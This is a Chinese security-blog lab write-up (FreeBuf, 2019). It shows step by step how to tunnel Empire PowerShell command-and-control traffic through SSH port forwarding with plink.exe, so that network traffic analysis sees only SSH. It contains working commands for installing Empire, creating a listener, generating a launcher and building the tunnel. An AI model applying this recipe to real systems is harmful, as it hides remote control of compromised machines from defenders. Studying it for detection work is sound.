利用SSH隧道加密、隐蔽C&C通信流量

2019 年 7 月 19 日 FreeBuf

一、背景简介

在网络攻防博弈中,网络流量特征分析类安全防御措施得到了广泛应用。众多厂商和企业对网络流量进行恶意流量分析检测,从而针对性的采取防御措施,如各级ISP在骨干网络设备上大多采用网络流量分析检测的防御方案。

本文想通过标准的SSH的端口转发建立SSH形式的加密隧道,用于加密、隐蔽传输恶意流量,从而避免通过流量检测发现恶意行为。复现实验部分以C&C通信流量为例进入实验。通过SSH隧道进行加密和隐藏的C&C流量在外部流量特征分析仅表现为标准SSH流量。

二、实验原理

本次实验使用Empire工具快速搭建C&C信道,本文只简要介绍对于Empire工具。在Windows平台下使用Plink.exe工具的SSH功能搭建SSH隧道。

2.1 SSH隧道介绍

SSH 会自动加密和解密所有 SSH 客户端与服务端之间的网络数据。但是, SSH 还能够将其他 TCP 端口的网络数 据通过 SSH 链接来转发,并且自动提供了相应的加密及解密服务。这一过程也被叫做“隧道”( tunneling),这是因 为 SSH 为其他 TCP 链接提供了一个安全的通道来进行传输而得名。SSH隧道的实现主要使用SSH的参数配置进行端 口转发,即将所需传输的数据内容通过加密的SSH隧道进行转发。SSH 端口转发能够提供两大功能:1、加密 SSH Client 端至 SSH Server 端之间的通讯数据。2、突破防火墙的限制完成一些之前无法建立的 TCP 连接。

由于SSH的安全性,在数据跨越公网时其他人无法得知数据内容。SSH端口转发有本地转发、远程转发和动态端 口转发三种。本次实验主要以本地转发为例。本地转发主要使用SSH的 -L参数解释:

(1) 第1部分,-L选项表示使用“本地转发”建立ssh隧道。“本地转发”表示本地的某个端口上的通讯数据会被转发到目标主机的对应端口。

(2) 第2部分表示:通讯数据会从本地的9906端口上被转发,最终被转发到10.1.0.2的3306端口。  

(3) 第3部分表示:我们创建的ssh隧道是连接到10.1.0.2上的root用户。

2.2 Empire工具简介

Empire是一个针对windows平台、提供从Stager生成到提取和渗透维持一系列功能齐全的渗透攻击框架,其最 大的特点是以PowerShell脚本作为攻击载荷,而且Empire实现了无需powershell.exe就可运行PowerShell代理功 能,即它是一个纯粹的PowerShell后期漏洞利用代理工具。快速部署后期漏洞利用模块,内置模块有键盘记录、 Mimikatz、绕过UAC、内网扫描等等,并且能够适应通信躲避网络检测和大部分安全防护工具的查杀,简单来说 Empire类似于渗透神器Metasploit,是一个基于PowerShell的远程控制木马。

2.2 Empire工具安装

在实验虚拟linux系统中安装

  
  
    
git clone https://github.com/EmpireProject/Empire.git #进入setup目录进行命令行安装cd Empirecd setupsudo ./install.sh

安装成功后,确认Empire目录下所有文件(目录)如下图:

使用 ./empire 启动Empire如下图,则成功安装。

三、实验步骤

实验说明:使用两台虚拟机ubuntu16  +  windows 7,其中ubuntu16模拟控制端,windows 7模拟受控主机。

3.1 在ubuntu系统上搭建SSH服务端

(1) 安装Open-SSH Server端 

  
  
    
sudo apt-get install openssh-server

(2) 配置SSH Server端

编辑/etc/ssh/sshd_config文件中允许口令登录PermitRootLogin配置如下图:

(3) 测试SSH登录是否成功

查看本机IP(linux命令:ifconfig),如在windows下的XShell工具下输入Server IP 输入登录名和密码,成功登入系统则SSH Server端搭建成功。

注:需要重启sshd服务:/etc/init.d/ssh resar

(4) 配置RSA密钥对认证登录

a) 生成rsa密钥对

  
  
    
ssh-keygen -t rsa

b) 开启sshd支持RSA认证选项,并添加认证公钥路径地址

c) 编辑/etc/ssh/sshd_config文件中的PubkeyAuthentication选项配置为yes,即:

d) 复制公钥到某用户home目录下的.ssh文件夹下,注必须使用以下命令在受控主机(本次实验使用win 7进行模拟)进行复制,否则文件权限设置易出错。

  
  
    
ssh-copy-id -i id_rsa.pub 主机登录用户名@192.168.81.137

e) 使用私钥进行登录ssh登录

  
  
    
ssh -i 私钥路径 主机登录用户名@192.168.81.137

注:使用putty、winscp等工具时需要先使用对应平台工具进行rsa私钥导入后转化为相对应文件格式,如本次实验使用putty工具导入生成私钥文件sshrsa.ppk。

3.2 使用Empire工具生成PowerShell脚本备用

Empire工具类似Metasploit,详细使用教程可参考一篇文章精通PowerShell Empire。

本次实验使用Empire生成简单的PowerShell脚本,建立最简单的C&C通信。下面简单概括主要步骤。

(1) 设置监听

  
  
    
listeners #进入的界面下可输入list查看以设置的监听uselistener http #输入 info查看必填参数set Name 4444 #本次实验通过SSH隧道通信,因此设置监听127.0.0.1:4444set Port 4444set Host 127.0.0.1execute #创建命为4444的监听,监听127.0.0.1:4444上通信数据

示例如下:

(2) 生成简单的PowerShell利用脚本(针对windows)

  
  
    
launcher powershell 4444 # 4444为设置的监听名字#可进入tagers生成其他木马、远控程序,本次实验直接生成最简单PowerShell利用脚本

注:生成的Powershell代码直接复制并保存,以备在受控windows主机(win7、win10)执行。

3.3 搭建SSH隧道

(1) windows下使用Plink.exe(putty工具集中可以在windows系统下使用命令行进行SSH连接)连接SSH

Server

  
  
    
#需要首先进入Plink.exe文件所在路径Plink.exe -ssh -l 登录用户名 -pw 登录密码 SSH主机IP

(2) Plink相关参数

-ssh 指定使用特定连接协议

-l 指定登录用户名

-i 指定RSA私钥登录

-L 本地转发

(3) Plink端口转发设计

  
  
    
plink.exe -ssh -i sshrsa.ppk am00n@192.168.81.137 -L 4444:192.168.81.137:4444

将本地端口(4444)转发到远程目标主机(192.168.81.137)的目标端口(4444)。

注意:以上命令执行成功后,需要保持命令行不要关闭。同时可以组合使用SSH的其他参数进行后台运行、不交互等。

(4) 使用(2)中生成的PowerShell脚本,使受控主机上线

a) windows 7虚拟机另外开启一个CMD窗口,复制PowerShell脚本执行。可以看到受控主机以上线。

5) ubuntu端切换到agents界面,list命令查看如图:

6) 通过interact命令则可以使用以建立的控制信道控制受控主机,如通过简单的ls命令测试成功如下图:

7) 至此以成功使用SSH隧道传输C&C通信流量,后续可在此基础上设计实现其他C&C控制命令及其它恶意功能。

四、总结

通过本次实验可以看出,攻击者可以利用类似SSH的公共服务或可用技术辅助攻击,且其实现也非常容易。

关键步骤总结

(1) 搭建SSH服务,并配置为RSA私钥登录(也可以配置为免密登录)。

(2) 使用工具(如Empire、Metasploit等)构建C&C。

(3) 利用SSH的端口转发搭建SSH隧道。

(4) 配置C&C和SSH参数使二者配合实现加密、隐藏恶意流量的目的。

本文思想源于FreeBuf大神"興趣使然的小胃",特此感谢。

*本文作者:mumufeng06,本文属 FreeBuf 原创奖励计划,未经许可禁止转载

精彩推荐


登录查看更多
0

相关内容

Secure Shell(SSH)为创建在应用层和传输层基础上的安全协议。
【2020新书】实战R语言4,323页pdf
专知会员服务
100+阅读 · 2020年7月1日
【SIGIR2020】用于冷启动推荐的内容感知神经哈希
专知会员服务
22+阅读 · 2020年6月2日
干净的数据:数据清洗入门与实践,204页pdf
专知会员服务
161+阅读 · 2020年5月14日
【实用书】Python爬虫Web抓取数据,第二版,306页pdf
专知会员服务
117+阅读 · 2020年5月10日
【ICMR2020】持续健康状态接口事件检索
专知会员服务
17+阅读 · 2020年4月18日
广东疾控中心《新型冠状病毒感染防护》,65页pdf
专知会员服务
18+阅读 · 2020年1月26日
专知会员服务
207+阅读 · 2019年8月30日
后渗透利用msf关闭防火墙
黑白之道
8+阅读 · 2019年8月24日
亿级订单数据的访问与存储,怎么实现与优化?
码农翻身
16+阅读 · 2019年4月17日
I2P - 适用于黑客的Android应用程序
黑白之道
30+阅读 · 2019年3月6日
介绍WAF以及过滤机制
黑白之道
22+阅读 · 2019年2月5日
逆向 | C++ 加壳程序的编写思路
计算机与网络安全
9+阅读 · 2019年1月1日
如何用GitLab本地私有化部署代码库?
Python程序员
9+阅读 · 2018年12月29日
威胁情报驱动:F3EAD 之利用
计算机与网络安全
4+阅读 · 2018年12月28日
IPSec | IKE密钥交换原理
计算机与网络安全
18+阅读 · 2018年12月23日
【宁波站】网络爬虫与文本挖掘
数萃大数据
5+阅读 · 2017年7月19日
Bidirectional Attention for SQL Generation
Arxiv
4+阅读 · 2018年6月21日
Arxiv
3+阅读 · 2018年3月13日
Arxiv
6+阅读 · 2018年1月14日
VIP会员
相关VIP内容
相关资讯
后渗透利用msf关闭防火墙
黑白之道
8+阅读 · 2019年8月24日
亿级订单数据的访问与存储,怎么实现与优化?
码农翻身
16+阅读 · 2019年4月17日
I2P - 适用于黑客的Android应用程序
黑白之道
30+阅读 · 2019年3月6日
介绍WAF以及过滤机制
黑白之道
22+阅读 · 2019年2月5日
逆向 | C++ 加壳程序的编写思路
计算机与网络安全
9+阅读 · 2019年1月1日
如何用GitLab本地私有化部署代码库?
Python程序员
9+阅读 · 2018年12月29日
威胁情报驱动:F3EAD 之利用
计算机与网络安全
4+阅读 · 2018年12月28日
IPSec | IKE密钥交换原理
计算机与网络安全
18+阅读 · 2018年12月23日
【宁波站】网络爬虫与文本挖掘
数萃大数据
5+阅读 · 2017年7月19日
Top
微信扫码咨询专知VIP会员